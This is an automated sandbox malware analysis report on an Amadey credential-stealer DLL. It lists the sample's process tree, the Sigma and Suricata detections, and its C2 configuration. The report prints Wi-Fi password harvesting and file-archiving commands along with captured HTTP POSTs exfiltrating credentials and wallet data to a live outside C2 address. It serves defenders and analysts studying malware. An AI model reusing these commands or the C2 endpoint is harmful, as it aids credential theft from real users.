Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mU3Ob2XcCt.dll

Overview

General Information

Sample name:mU3Ob2XcCt.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name:af03a0d9fbfcafefa431092f93d37f01.exe
Analysis ID:1542875
MD5:af03a0d9fbfcafefa431092f93d37f01
SHA1:6b7295a441a3d79f60614af75fe70569f48d10ac
SHA256:d039144af15395af18d802e15aaac97ed9521329c33c5f1798412992fc26daff
Tags:64exetrojan
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6892 cmdline: loaddll64.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4884 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5768 cmdline: rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 6024 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6816 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 5356 cmdline: rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 396 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5324 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7272 cmdline: rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Save MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7380 cmdline: rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",Main MD5: EF3179D498793BF4234F708D3BE28633)
      • netsh.exe (PID: 7420 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7516 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7388 cmdline: rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",Save MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.217/CoreOPT/index.php", "Version": "5.03"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
mU3Ob2XcCt.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5768, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6816, ProcessName: powershell.exe
    Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5768, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6816, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5768, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6816, ProcessName: powershell.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Capture Wi-Fi password
    Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5356, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 396, ProcessName: netsh.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-26T19:13:44.951158+020028552391A Network Trojan was detected192.168.2.449731185.215.113.21780TCP
    2024-10-26T19:13:44.968578+020028552391A Network Trojan was detected192.168.2.449730185.215.113.21780TCP
    2024-10-26T19:13:51.880222+020028552391A Network Trojan was detected192.168.2.449732185.215.113.21780TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: mU3Ob2XcCt.dllMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.217/CoreOPT/index.php", "Version": "5.03"}
    Multi AV Scanner detection for submitted file
    Source: mU3Ob2XcCt.dllReversingLabs: Detection: 31%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
    Source: mU3Ob2XcCt.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1928165981.000002075CEE2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: {(n.pdby source: powershell.exe, 00000009.00000002.1910398664.000002075CD94000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000012.00000002.2014326484.00000275F1A90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbzL source: powershell.exe, 00000012.00000002.2020625808.00000275F1E5F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbTp source: powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb) source: powershell.exe, 00000009.00000002.1926623428.000002075CEB5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: HCore.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E5F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbattB{H source: powershell.exe, 00000009.00000002.1915097945.000002075CE69000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbons@ source: powershell.exe, 00000012.00000002.2018733030.00000275F1DD4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb& source: powershell.exe, 00000012.00000002.2018170222.00000275F1DBE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tem.Core.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E5F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt source: powershell.exe, 00000009.00000002.1915097945.000002075CE69000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: &D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: mU3Ob2XcCt.dll
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1915097945.000002075CE2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020625808.00000275F1E4C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: mU3Ob2XcCt.dll
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1910398664.000002075CD94000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rlib.pdb source: powershell.exe, 00000009.00000002.1903432484.000002075CB46000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: l\mscorlib.pdb source: powershell.exe, 00000009.00000002.1928165981.000002075CEE2000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdberShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.1915097945.000002075CE2C000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49730 -> 185.215.113.217:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49732 -> 185.215.113.217:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49731 -> 185.215.113.217:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.215.113.217 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorIPs: 185.215.113.217
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxMg==Host: 185.215.113.217Content-Length: 4772Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: POST /CoreOPT/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxMg==Host: 185.215.113.217Content-Length: 4772Cache-Control: no-cache
    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknownHTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/$
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1957191007.0000019A2B07A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2036889929.000001C6671CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php$L
    Source: rundll32.exe, 0000000E.00000002.2036889929.000001C6671CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php7
    Source: rundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1/Q
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1?~
    Source: rundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1E
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1er
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1ocal
    Source: rundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.php?wal=1t
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/CoreOPT/index.phpXLW
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/OQa
    Source: powershell.exe, 00000009.00000002.1795696530.00000207463D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872628255.000002CA90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA818D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2001321046.00000275E99F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000009.00000002.1795696530.0000020744D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000009.00000002.1795696530.0000020744B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000009.00000002.1795696530.0000020744D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000009.00000002.1795696530.0000020744B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2017039352.00000275F1CB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2017492572.00000275F1CC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DAE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000009.00000002.1795696530.0000020746075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA81541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DAFAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 0000000A.00000002.1907194891.000002CAEA097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
    Source: powershell.exe, 00000009.00000002.1795696530.00000207463D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872628255.000002CA90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA818D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2001321046.00000275E99F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B3100AD9_2_00007FFD9B3100AD
    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winDLL@32/20@0/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
